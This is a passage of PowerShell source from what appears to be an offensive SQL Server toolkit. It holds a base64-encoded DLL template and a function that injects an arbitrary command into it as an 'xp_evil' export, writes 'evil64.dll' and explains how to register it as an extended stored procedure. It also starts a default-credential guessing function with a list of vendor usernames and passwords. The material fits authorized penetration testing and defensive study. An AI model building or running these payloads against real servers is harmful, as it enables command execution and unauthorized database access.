bml0dGVybQB1AV9pbml0dGVybV9lAMECX3NlaF9maWx0ZXJfZGxsAHEBX2luaXRpYWxpemVfbmFycm93X2Vudmlyb25tZW50AAByAV9pbml0aWFsaXplX29uZXhpdF90YWJsZQAAtAJfcmVnaXN0ZXJfb25leGl0X2Z1bmN0aW9uAOUAX2V4ZWN1dGVfb25leGl0X3RhYmxlAMIAX2NydF9hdGV4aXQAwQBfY3J0X2F0X3F1aWNrX2V4aXQAAKQAX2NleGl0AABKBXRlcm1pbmF0ZQBoAF9fc3RkaW9fY29tbW9uX3ZzcHJpbnRmX3MAmwNfd21ha2VwYXRoX3MAALcDX3dzcGxpdHBhdGhfcwBjBXdjc2NweV9zAAB1Y3J0YmFzZWQuZGxsADAEUXVlcnlQZXJmb3JtYW5jZUNvdW50ZXIAEAJHZXRDdXJyZW50UHJvY2Vzc0lkABQCR2V0Q3VycmVudFRocmVhZElkAADdAkdldFN5c3RlbVRpbWVBc0ZpbGVUaW1lAFQDSW5pdGlhbGl6ZVNMaXN0SGVhZACuBFJ0bENhcHR1cmVDb250ZXh0ALUEUnRsTG9va3VwRnVuY3Rpb25FbnRyeQAAvARSdGxWaXJ0dWFsVW53aW5kAABqA0lzRGVidWdnZXJQcmVzZW50AJIFVW5oYW5kbGVkRXhjZXB0aW9uRmlsdGVyAABSBVNldFVuaGFuZGxlZEV4Y2VwdGlvbkZpbHRlcgDFAkdldFN0YXJ0dXBJbmZvVwBwA0lzUHJvY2Vzc29yRmVhdHVyZVByZXNlbnQAbQJHZXRNb2R1bGVIYW5kbGVXAABEBFJhaXNlRXhjZXB0aW9uAADUA011bHRpQnl0ZVRvV2lkZUNoYXIA3QVXaWRlQ2hhclRvTXVsdGlCeXRlAFYCR2V0TGFzdEVycm9yAAA4A0hlYXBBbGxvYwA8A0hlYXBGcmVlAACpAkdldFByb2Nlc3NIZWFwAACzBVZpcnR1YWxRdWVyeQAApAFGcmVlTGlicmFyeQCkAkdldFByb2NBZGRyZXNzAAAPAkdldEN1cnJlbnRQcm9jZXNzAHAFVGVybWluYXRlUHJvY2VzcwAAS0VSTkVMMzIuZGxsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAABkAAAA2AAAASQAAAAAAAABMAAAANwAAAAsAAAALAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAjEAGAAQAAAAAAAAAAAAAAbBIBgAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAQAgAAAAIK4orjCuOK5AriivMK84r0CvSK9QrwAAAMABABQAAABYqGCoCKkgqSipeK0A0AEADAAAAKigAAAAQAIADAAAAACgEKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'\n\n    # Convert it to a byte array\n    [Byte[]]$DllBytes = [Byte[]][Convert]::FromBase64String($DllBytes64)\n\n    # This is the string in the DLL template that will need to be replaced\n    $BufferString = 'REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!'\n\n    # -----------------------------------------------\n    # Setup command\n    # -----------------------------------------------\n\n    # Command to injectin into the DLL (if not defined by the user)\n    IF(-not($Command))\n    {\n        $CommandString = 'echo This is a test. > c:\\temp\\test.txt && REM'\n    }\n    else\n    {\n        $CommandString = \"$Command && REM\"\n    }\n\n    # Calculate the length of the BufferString\n    $BufferStringLen = $BufferString.Length\n\n    # Calculate the length of the Command\n    $CommandStringLen = $CommandString.Length\n\n    # Check if the command is to long to be accepted by cmd.exe used by the system call\n    if ($CommandStringLen -gt $BufferStringLen)\n    {\n        Write-Warning -Message ' Command is too long!'\n        Break\n    }\n    else\n    {\n        $BuffLenDiff = $BufferStringLen - $CommandStringLen\n        $NewBuffer = ' ' * $BuffLenDiff\n        $CommandString = \"$CommandString && REM $NewBuffer\"\n    }\n\n    # Convert command string\n    $CommandStringBytes = ([system.Text.Encoding]::UTF8).GetBytes($CommandString)\n\n    # Get string value of the DLL file\n    $S = [System.Text.Encoding]::ASCII.GetString($DllBytes)\n\n    # Set the offset to 0\n    $Index = 0\n\n    # Get the starting offset of the buffer string\n    $Index = $S.IndexOf($BufferString)\n\n    if(($Index -eq 0) -and ($Index -ne -1))\n    {\n        throw(\"Could not find string $BufferString !\")\n        Break\n    }\n    else\n    {\n        Write-Verbose -Message \" Found buffer offset for command: $Index\"\n    }\n\n    # Replace target bytes\n    for ($i = 0; $i -lt $CommandStringBytes.Length; $i++)\n    {\n        $DllBytes[$Index+$i] = $CommandStringBytes[$i]\n    }\n\n    # -----------------------------------------------\n    # Setup proc / dll function export name\n    # -----------------------------------------------\n    $ProcNameBuffer = 'EVILEVILEVILEVILEVIL'\n\n    # Set default dll name\n    IF(-not($ExportName))\n    {\n        $ExportName = 'xp_evil'\n    }\n\n    # Check function name length\n    $ProcNameBufferLen = $ProcNameBuffer.Length\n    $ExportNameLen = $ExportName.Length\n    If ($ProcNameBufferLen -lt $ExportNameLen)\n    {\n        Write-Warning -Message ' The function name is too long!'\n        Break\n    }\n    else\n    {\n        $ProcBuffLenDiff = $ProcNameBufferLen - $ExportNameLen\n        $ProcNewBuffer = '' * $ProcBuffLenDiff\n        #$ExportName = \"$ExportName$ProcNewBuffer\" # need to write nullbytes\n    }\n\n    # Get function name string offset\n    $ProcIndex = 0\n\n    # Get string value of the DLL file\n    $S2 = [System.Text.Encoding]::ASCII.GetString($DllBytes)\n\n    $ProcIndex = $S2.IndexOf($ProcNameBuffer)\n\n    # Check for offset errors\n    if(($ProcIndex -eq 0) -and ($ProcIndex -ne -1))\n    {\n        throw(\"Could not find string $ProcNameBuffer!\")\n        Break\n    }\n    else\n    {\n        Write-Verbose -Message \" Found buffer offset for function name: $ProcIndex\"\n    }\n\n    # Convert function name to bytes\n    $ExportNameBytes = ([system.Text.Encoding]::UTF8).GetBytes($ExportName)\n\n    # Replace target bytes\n    for ($i = 0; $i -lt $ExportNameBytes.Length; $i++)\n    {\n        $DllBytes[$ProcIndex+$i] = $ExportNameBytes[$i]\n    }\n\n    # Get offset for nulls\n    $NullOffset = $ProcIndex+$ExportNameLen\n    Write-Verbose -Message \" Found buffer offset for buffer: $NullOffset\"\n    $NullBytes = ([system.Text.Encoding]::UTF8).GetBytes($ProcNewBuffer)\n\n    # Replace target bytes\n    for ($i = 0; $i -lt $ProcBuffLenDiff; $i++)\n    {\n        $DllBytes[$NullOffset+$i] = $NullBytes[$i]\n    }\n\n    # ------------------------------------\n    # Write DLL file to disk\n    # ------------------------------------\n\n    IF(-not($OutFile))\n    {\n        $OutFile = '.\\evil64.dll'\n    }\n\n    Write-Verbose -Message \"Creating DLL $OutFile\"\n    Write-Verbose -Message \" - Exported function name: $ExportName\"\n    Write-Verbose -Message \" - Exported function command: `\"$Command`\"\"\n    Write-Verbose -Message \" - Manual test: rundll32 $OutFile,$ExportName\"\n    Set-Content -Value $DllBytes -Encoding Byte -Path $OutFile\n    Write-Verbose -Message ' - DLL written'\n\n    Write-Verbose -Message ' '\n    Write-Verbose -Message 'SQL Server Notes'\n    Write-Verbose -Message 'The exported function can be registered as a SQL Server extended stored procedure. Options below:'\n    Write-Verbose -Message \" - Register xp via local disk: sp_addextendedproc `'$ExportName`', 'c:\\temp\\myxp.dll'\"\n    Write-Verbose -Message \" - Register xp via UNC path: sp_addextendedproc `'$ExportName`', `'\\\\servername\\pathtofile\\myxp.dll`'\"\n    Write-Verbose -Message \" - Unregister xp: sp_dropextendedproc `'$ExportName`'\"\n}\n\n# ----------------------------------\n#  Get-SQLServerLoginDefaultPw\n# ----------------------------------\n# Author: Scott Sutherland\n# Reference: https://github.com/pwnwiki/pwnwiki.github.io/blob/master/tech/db/mssql.md\nFunction  Get-SQLServerLoginDefaultPw\n{\n    <#\n            .SYNOPSIS\n            Based on the instance name, test if SQL Server is configured with default passwords.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .EXAMPLE\n            PS C:\\> Get-SQLServerLoginDefaultPw -Instance SQLServer1\\STANDARDDEV2014\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceLocal | Get-SQLServerLoginDefaultPw -Verbose\n            VERBOSE: SQLServer1\\SQLEXPRESS : Confirmed instance match.\n            VERBOSE: SQLServer1\\SQLEXPRESS : No credential matches were found.\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : Confirmed instance match.\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : Confirmed default credentials - test/test\n            VERBOSE: SQLServer1 : No instance match found.\n\n            Computer       Instance                       Username Password IsSysadmin\n            --------       --------                       -------- -------- --------\n            SQLServer1     SQLServer1\\STANDARDDEV2014     test     test      No\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceLDomain | Get-SQLServerLoginDefaultPw -Verbose\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblResults = New-Object -TypeName System.Data.DataTable\n        $TblResults.Columns.Add('Computer') | Out-Null\n        $TblResults.Columns.Add('Instance') | Out-Null\n        $TblResults.Columns.Add('Username') | Out-Null\n        $TblResults.Columns.Add('Password') | Out-Null \n        $TblResults.Columns.Add('IsSysAdmin') | Out-Null\n\n        # Create table for database of defaults\n        $DefaultPasswords = New-Object System.Data.DataTable\n        $DefaultPasswords.Columns.Add('Instance') | Out-Null\n        $DefaultPasswords.Columns.Add('Username') | Out-Null\n        $DefaultPasswords.Columns.Add('Password') | Out-Null        \n\n        # Populate DefaultPasswords data table\n        $DefaultPasswords.Rows.Add(\"ACS\",\"ej\",\"ej\") | Out-Null\n        $DefaultPasswords.Rows.Add(\"ACT7\",\"sa\",\"sage\") | Out-Null\n        $DefaultPasswords.Rows.Add(\"AOM2\",\"admin\",\"ca_admin\") | out-null\n        $DefaultPasswords.Rows.Add(\"ARIS\",\"ARIS9\",\"*ARIS!1dm9n#\") | out-null\n        $DefaultPasswords.Rows.Add(\"AutodeskVault\",\"sa\",\"AutodeskVault@26200\") | Out-Null      \n        